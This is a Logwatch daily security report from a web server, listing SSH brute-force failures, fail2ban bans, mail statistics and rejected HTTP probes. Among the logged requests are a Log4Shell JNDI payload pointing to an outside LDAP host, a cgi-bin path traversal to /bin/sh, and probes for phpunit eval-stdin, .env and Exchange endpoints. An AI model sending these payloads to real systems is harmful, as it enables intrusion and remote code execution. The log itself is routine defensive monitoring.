################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Dec 23 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-22 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 32:32 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 91.200.100.126 -> 45.155.173.143:4444: 5 Time(s) A total of 7 sites probed the server 156.146.50.142 193.169.253.168 2.56.59.221 217.138.211.252 44.199.209.141 66.240.205.34 80.82.77.139 Requests with error response codes 400 Bad Request null: 22 Time(s) 45.155.173.143:4444: 5 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s) /: 2 Time(s) /config/getuser?index=0: 2 Time(s) /socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 2 Time(s) mstshash=Administr: 2 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s) /socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s) 404 Not Found //2019/wp-includes/wlwmanifest.xml: 2 Time(s) //2020/wp-includes/wlwmanifest.xml: 2 Time(s) //blog/wp-includes/wlwmanifest.xml: 2 Time(s) //cms/wp-includes/wlwmanifest.xml: 2 Time(s) //news/wp-includes/wlwmanifest.xml: 2 Time(s) //shop/wp-includes/wlwmanifest.xml: 2 Time(s) //site/wp-includes/wlwmanifest.xml: 2 Time(s) //sito/wp-includes/wlwmanifest.xml: 2 Time(s) //test/wp-includes/wlwmanifest.xml: 2 Time(s) //web/wp-includes/wlwmanifest.xml: 2 Time(s) //website/wp-includes/wlwmanifest.xml: 2 Time(s) //wordpress/wp-includes/wlwmanifest.xml: 2 Time(s) //wp-includes/wlwmanifest.xml: 2 Time(s) //wp/wp-includes/wlwmanifest.xml: 2 Time(s) //wp1/wp-includes/wlwmanifest.xml: 2 Time(s) //wp2/wp-includes/wlwmanifest.xml: 2 Time(s) //xmlrpc.php?rsd: 2 Time(s) 499 (undefined) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... RngaPq2OBBlAAAV: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s) /socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s) /socket.io/?noteId=features&EIO=3&transpor ... MESwy-Vc1O8AAAY: 1 Time(s) /socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 1 Time(s) /socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s) 500 Internal Server Error /: 20 Time(s) /robots.txt: 4 Time(s) /.env: 2 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /ReportServer: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /clover/gui/login.jsf: 1 Time(s) /favicon.ico: 1 Time(s) /fuel: 1 Time(s) /login: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (40.70.0.187): 34 Time(s) root (101.178.223.39): 32 Time(s) root (180.251.83.49): 32 Time(s) root (46.101.94.164): 29 Time(s) root (116.196.122.196): 22 Time(s) root (125.19.244.38): 19 Time(s) unknown (46.101.94.164): 19 Time(s) root (139.186.155.99): 17 Time(s) root (218.14.208.90): 17 Time(s) unknown (101.178.223.39): 17 Time(s) root (139.198.123.106): 16 Time(s) root (161.35.45.62): 16 Time(s) unknown (180.251.83.49): 16 Time(s) unknown (40.70.0.187): 15 Time(s) root (206.189.206.212): 14 Time(s) unknown (104.131.68.23): 14 Time(s) unknown (206.189.206.212): 10 Time(s) unknown (218.14.208.90): 10 Time(s) unknown (161.35.45.62): 9 Time(s) unknown (139.198.123.106): 7 Time(s) unknown (116.196.122.196): 6 Time(s) unknown (125.19.244.38): 4 Time(s) unknown (139.186.155.99): 4 Time(s) root (104.131.68.23): 3 Time(s) root (117.197.8.210): 3 Time(s) root (41.215.138.42): 3 Time(s) root (106.12.219.184): 2 Time(s) unknown (186.210.85.101): 2 Time(s) unknown (195.87.255.34): 2 Time(s) unknown (83.24.19.118.ipv4.supernova.orange.pl): 2 Time(s) unknown (net-37-179-143-123.cust.vodafonedsl.it): 2 Time(s) mysql (101.178.223.39): 1 Time(s) root (1.85.216.127): 1 Time(s) root (146.185.79.101): 1 Time(s) root (vmi738717.contaboserver.net): 1 Time(s) unknown (106.12.219.184): 1 Time(s) unknown (112.18.69.127): 1 Time(s) unknown (114.67.104.59): 1 Time(s) unknown (117.197.8.210): 1 Time(s) unknown (134.236.247.145): 1 Time(s) unknown (204.44.68.125): 1 Time(s) unknown (46.161.27.162): 1 Time(s) unknown (92.255.85.237): 1 Time(s) Invalid Users: Unknown Account: 147 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 2 Miscellaneous warnings 9.604K Bytes accepted 9,834 9.604K Bytes sent via SMTP 9,834 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 64 Connections 15 Connections lost (inbound) 64 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.85.216.127: 1 time 40.70.0.187: 34 times 41.215.138.42: 3 times 46.101.94.164: 29 times 101.178.223.39 (cpe-101-178-223-39.static.nsw.asp.telstra.net): 33 times 104.131.68.23: 3 times 106.12.219.184: 2 times 116.196.122.196: 22 times 117.197.8.210: 3 times 125.19.244.38: 19 times 139.186.155.99: 17 times 139.198.123.106: 16 times 146.185.79.101: 1 time 161.35.45.62: 16 times 180.251.83.49: 32 times 194.163.133.196 (vmi738717.contaboserver.net): 1 time 206.189.206.212: 14 times 218.14.208.90: 17 times Illegal users from: 2001:470:1:c84::21: 1 time undef: 102 times 37.179.143.123 (net-37-179-143-123.cust.vodafonedsl.it): 2 times 40.70.0.187: 15 times 46.101.94.164: 19 times 46.161.27.162: 1 time 65.49.20.68 (scan-19.shadowserver.org): 1 time 83.24.19.118 (83.24.19.118.ipv4.supernova.orange.pl): 2 times 92.255.85.237: 1 time 101.178.223.39 (cpe-101-178-223-39.static.nsw.asp.telstra.net): 17 times 104.131.68.23: 14 times 106.12.219.184: 1 time 112.18.69.127: 1 time 114.67.104.59: 1 time 116.196.122.196: 6 times 117.197.8.210: 1 time 125.19.244.38: 4 times 134.236.247.145: 1 time 139.186.155.99: 4 times 139.198.123.106: 7 times 161.35.45.62: 9 times 180.251.83.49: 16 times 186.210.85.101 (186-210-085-101.xd-dynamic.algarnetsuper.com.br): 2 times 195.87.255.34: 2 times 204.44.68.125 (204.44.68.125.static.quadranet.com): 1 time 206.189.206.212: 10 times 218.14.208.90: 10 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################